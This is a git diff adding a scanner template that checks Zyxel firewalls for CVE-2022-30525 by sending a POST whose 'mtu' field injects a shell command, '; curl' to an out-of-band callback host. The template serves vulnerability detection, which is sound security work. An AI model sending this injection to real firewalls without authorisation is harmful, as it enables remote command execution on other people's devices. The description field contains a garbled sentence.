diff --git a/cves/2022/CVE-2022-30525.yaml b/cves/2022/CVE-2022-30525.yaml
new file mode 100644
index 0000000000..359020a92e
--- /dev/null
+++ b/cves/2022/CVE-2022-30525.yaml
@@ -0,0 +1,33 @@
+id: CVE-2022-30525
+
+info:
+  name: Zyxel Firewall - Unauthenticated RCE
+  author: h1ei1,prajiteshsingh
+  severity: critical
+  description: |
+    The vulnerability affects Zyxel firewalls that support Zero Touch Provisioning (ZTP), including the ATP Series, VPN Series, and USG FLEX Series (including USG20-VPN and USG20W-VPN), allowing an unauthenticated remote attacker to target the affected device as nobody Execute arbitrary code as a user on.
+  reference:
+    - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
+    - https://github.com/rapid7/metasploit-framework/pull/16563
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-30525
+  tags: rce,zyxel,cve,cve2022,firewall,unauth
+
+requests:
+  - raw:
+      - |
+        POST /ztp/cgi-bin/handler HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{interactsh-url}};","data":"hi"}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: status
+        status:
+          - 500